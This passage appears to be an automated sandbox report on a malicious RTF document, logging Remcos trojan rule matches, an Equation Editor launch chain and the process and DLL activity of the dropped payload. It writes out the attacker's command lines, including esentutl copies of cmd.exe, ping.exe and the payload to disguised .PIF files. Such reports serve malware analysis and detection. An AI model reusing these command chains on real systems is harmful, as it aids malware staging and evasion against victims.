                  Source: 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: audiodg.exe PID: 3780, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.troj.expl.evad.winRTF@19/18@3/2
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$hpP6V2fo.rtfJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8E79.tmpJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exe Console Write: The batch file cannot be found. Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: K0hpP6V2fo.rtfReversingLabs: Detection: 47%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\audiodg.exe "C:\Users\user\AppData\Roaming\audiodg.exe"
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ahhbgzzQ.cmd" "
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Roaming\audiodg.exe /d C:\\Users\\Public\\Libraries\\Qzzgbhha.PIF /o
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: unknownProcess created: C:\Users\Public\Libraries\Qzzgbhha.PIF "C:\Users\Public\Libraries\Qzzgbhha.PIF"
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\audiodg.exe "C:\Users\user\AppData\Roaming\audiodg.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ahhbgzzQ.cmd" "Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Roaming\audiodg.exe /d C:\\Users\\Public\\Libraries\\Qzzgbhha.PIF /oJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exeJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: olepro32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: url.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
